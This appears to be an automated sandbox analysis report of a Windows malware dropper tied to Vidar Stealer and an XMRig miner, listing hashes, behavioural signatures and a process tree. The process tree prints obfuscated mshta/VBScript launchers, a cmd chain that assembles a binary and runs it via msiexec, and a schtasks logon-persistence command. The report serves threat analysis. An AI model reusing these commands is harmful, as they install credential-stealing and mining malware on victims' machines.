memory/2988-222-0x0000000002630000-0x0000000002820000-memory.dmp
memory/1156-223-0x0000000000400000-0x0000000002F02000-memory.dmp
memory/1272-241-0x0000000000400000-0x0000000000422000-memory.dmp
memory/304-249-0x0000000000400000-0x0000000000422000-memory.dmp
memory/304-246-0x0000000000400000-0x0000000000422000-memory.dmp
memory/304-245-0x0000000000400000-0x0000000000422000-memory.dmp
memory/304-244-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1272-242-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1272-248-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1272-240-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1272-238-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1272-236-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1272-234-0x0000000000400000-0x0000000000422000-memory.dmp
memory/304-231-0x0000000000400000-0x0000000000422000-memory.dmp
memory/304-228-0x0000000000400000-0x0000000000422000-memory.dmp
memory/304-226-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1864-250-0x0000000064940000-0x0000000064959000-memory.dmp
memory/304-224-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1376-138-0x0000000000080000-0x00000000000F0000-memory.dmp
memory/2396-136-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1969586bcbf58493.exe
| MD5 | 962b4643e91a2bf03ceeabcdc3d32fff |
| SHA1 | 994eac3e4f3da82f19c3373fdc9b0d6697a4375d |
| SHA256 | d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b |
| SHA512 | ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd |
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA1 | fc83150d1f81bfb2ff3c3d004ca864d53004fd27 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
| SHA512 | e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f |
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c1338f41ab.exe
| MD5 | 21a61f35d0a76d0c710ba355f3054c34 |
| SHA1 | 910c52f268dbbb80937c44f8471e39a461ebe1fe |
| SHA256 | d9c606fa8e99ee0c5e55293a993fb6a69e585a32361d073907a8f8e216d278dd |
| SHA512 | 3f33f07aee83e8d1538e5e3d1b723876ddbecc2a730b8eaf7846522f78f5fc6b65ed23085c3a51e62c91dc80b73c171d8f32c44b92cf144689a834e33ea01b3e |
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe
| MD5 | bf2f6094ceaa5016d7fb5e9e95059b6b |
| SHA1 | 25583e0b5a4e331a0ca97b01c5f4ecf6b2388bad |
| SHA256 | 47f383df5f55f756468fbb141377bed62056d72d933d675b3c3267d7be4b7f12 |
| SHA512 | 11d54869e1690824e74e33ee2e9975d28b77730588dde0eee540eefabdedf46576395301aeb607de2cf009b721172209d66a273ca5e3144061c1bdbe41e03f78 |
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19150ee2be694c8a4.exe
| MD5 | 83552f70e7791687013e0b6e77eef7f4 |
| SHA1 | ae6e0e3f2873dd234b4813d4c6a47364111dec8a |
| SHA256 | 72e3a9de1b4e4d7f3fc08a1e3071bfa7da14a79eb23fe54f47d6e4c38b3a5c84 |
| SHA512 | 969b5a9128c5ffff270e0019b5e1bc7b5cd250bf367e7c022aceac0e1496eedf50c657a52083416999ebf59a4eb57827306924febebae1ee9a833a6ad1b5b5c9 |
memory/2296-278-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2296-276-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2296-275-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2296-274-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2296-272-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2296-270-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2296-268-0x0000000000400000-0x0000000000422000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe
| MD5 | 363f9dd72b0edd7f0188224fb3aee0e2 |
| SHA1 | 2ee4327240df78e318937bc967799fb3b846602e |
| SHA256 | e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167 |
| SHA512 | 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece |
\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1993b3f72c.exe
| MD5 | 91e3bed725a8399d72b182e5e8132524 |
| SHA1 | 0f69cbbd268bae2a7aa2376dfce67afc5280f844 |
| SHA256 | 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d |
| SHA512 | 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76 |
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c78ded4d176ac.exe
| MD5 | 0c4602580c43df3321e55647c7c7dfdb |
| SHA1 | 5e4c40d78db55305ac5a30f0e36a2e84f3849cd1 |
| SHA256 | fa02543c043d0ca718baf3dfafb7f5d0c018d46ee6e0f0220095e5874f160752 |
| SHA512 | 02042264bc14c72c1e8e785812b81dad218e2ecf357db5497e80eabc739c4ad7d9176b6a9e061b909dac1ea188a7ca9e3b1c610c97d52e020ccd947f286dbe11 |
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue192762f1cd058ddf8.exe
| MD5 | 0b67130e7f04d08c78cb659f54b20432 |
| SHA1 | 669426ae83c4a8eacf207c7825168aca30a37ca2 |
| SHA256 | bca8618b405d504bbfe9077e3ca0f9fdb01f5b4e0e0a12409031817a522c50ac |
| SHA512 | 8f5495b850b99f92f18113d9759469768d3e16b4afa8ccdee5504886bced6a9ac75184f7c48f627ead16ce67834f5a641d6cea2cb5420e35c26e612572b12c79 |
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c06f159e0ec.exe
| MD5 | c1bc0cca3a8784bbc7d5d3e9e47e6ba4 |
| SHA1 | 500970243e0e1dd57e2aad4f372da395d639b4a3 |
| SHA256 | 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1 |
| SHA512 | 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5 |
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe
| MD5 | a4bf9671a96119f7081621c2f2e8807d |
| SHA1 | 47f50ae20bfa8b277f8c8c1963613d3f4c364b94 |
| SHA256 | d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7 |
| SHA512 | f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a |
memory/1864-284-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1864-283-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/1864-282-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1864-281-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/1864-279-0x0000000000400000-0x000000000051C000-memory.dmp
memory/1864-80-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/1864-79-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1864-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1864-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1864-74-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1864-73-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1864-72-0x0000000064940000-0x0000000064959000-memory.dmp
memory/1064-285-0x0000000000400000-0x0000000002F29000-memory.dmp
memory/1964-286-0x0000000000400000-0x00000000016FB000-memory.dmp
memory/1864-71-0x0000000064940000-0x0000000064959000-memory.dmp
memory/1864-70-0x0000000064941000-0x000000006494F000-memory.dmp
memory/1864-65-0x000000006FE40000-0x000000006FFC6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC6A42827\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/1864-61-0x000000006B440000-0x000000006B4CF000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC6A42827\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
\Users\Admin\AppData\Local\Temp\7zSC6A42827\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
memory/1864-299-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/1864-298-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1864-297-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1864-296-0x0000000064940000-0x0000000064959000-memory.dmp
memory/1864-290-0x0000000000400000-0x000000000051C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabC60D.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
Analysis: behavioral32
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:28
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
156s
Command Line
Signatures
Vidar
Vidar family
Xmrig family
xmrig
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-SGF52.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2956 set thread context of 1200 | N/A | C:\Users\Admin\AppData\Local\Temp\inst2.exe | C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg |
| PID 4320 set thread context of 4556 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\explorer.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Jonba.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\e58a3dc.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\inst2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Jonba.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\cxl-game.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\e58a3dc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-SGF52.tmp\setup.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\8.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Jonba.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\conhost.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe
"C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe"
C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
"C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"
C:\Users\Admin\AppData\Local\Temp\inst2.exe
"C:\Users\Admin\AppData\Local\Temp\inst2.exe"
C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg
C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg
C:\Users\Admin\AppData\Local\Temp\4.exe
"C:\Users\Admin\AppData\Local\Temp\4.exe"
C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
"C:\Users\Admin\AppData\Local\Temp\cxl-game.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp" /SL5="$40252,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
C:\Users\Admin\AppData\Local\Temp\8.exe
"C:\Users\Admin\AppData\Local\Temp\8.exe"
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
C:\Users\Admin\AppData\Local\Temp\is-SGF52.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SGF52.tmp\setup.tmp" /SL5="$C0042,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\Jonba.exe
"C:\Users\Admin\AppData\Local\Temp\Jonba.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1992 -ip 1992
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1992 -s 1660
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "search_hyperfs_206.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5048 -ip 5048
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 1016
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
C:\Windows\SysWOW64\msiexec.exe
msiexec -Y ..\lXQ2g.WC
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"
C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Users\Admin\AppData\Roaming\services64.exe
C:\Users\Admin\AppData\Roaming\services64.exe
C:\Users\Admin\AppData\Local\Temp\e58a3dc.exe
"C:\Users\Admin\AppData\Local\Temp\e58a3dc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2944 -ip 2944
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 780
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\explorer.exe
